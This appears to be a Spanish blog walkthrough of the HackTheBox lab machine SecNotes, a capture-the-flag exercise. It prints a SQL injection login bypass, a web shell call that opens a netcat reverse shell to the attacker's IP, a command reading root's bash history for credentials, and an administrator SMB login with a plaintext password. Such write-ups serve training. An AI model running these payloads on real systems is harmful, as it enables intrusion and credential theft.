Advertisement

header ads

SecNotes - HACKTHEBOX MACHINE

Empezamos un desafio de seguridad de HTB llamado SecNotes.

Vamos a empezar viendo sus puertos.

nmap -sV -sC  10.10.10.97
Tenemos el puerto 80, 445, empece haciendo una búsqueda de directorios no tuve mucho dato. Ahora empecemos a ver como se ve en el navegador y nos muestra un login y un register.
Me hizo recordar a un desafio de seguridad que cree para ekoparty y como creador de ese desafio intente romperlo con el mismo método. HERE Me fui a register y comence a registrar el usuario y contraseña con los siguiente:
' or 1=1#
Ahora mismo nos logueamos con lo mismo que registramos y obtenemos la siguiente informacion.
Ahora tenemos la credenciales para samba del puerto 445 pero vemos "secnotes.htb" y tenemos que modificar
nano /etc/hosts
10.10.10.97     secnotes.htb    secnotes
Y ahora podemos usar smbclient o el mismo directorio de gnome de kali linux.
Luego subimos una shell pero antes de hacerlo se nos olvido un puerto.
nmap -sV -sC -p- 10.10.10.97
Y tenemos un puerto 8808 en el cual podemos ejecutar nuestra shell. HERE
Ahora vamos a ver nuestro navegador
http://10.10.10.97:8808/creadshell.php?cmd=whoami
Recuerda que el servidor tiene un nc y podemos hacer un netcat.
http://10.10.10.97:8808/creadshell.php?cmd=netcat.exe%2010.10.13.155%206969%20-e%20cmd.exe
nc -lvp 6969
Ahora encontramos el user y necesitamos acceder al administrador.
Ahora podemos buscar un "bash.exe" en el cual vamos a ver el historial para encontrar la contraseña que se uso smbclient.
bash -c "uname -a"
bash -c "cat /root/.bash_history"
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
Pero lo usamos con la IP
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\10.10.10.97\\c$
Por estar conectado en smbclient no podemos usar get, entonces lo podemos descargar
get \Users\Administrator\Desktop\root.txt

Post a comment

1 Comments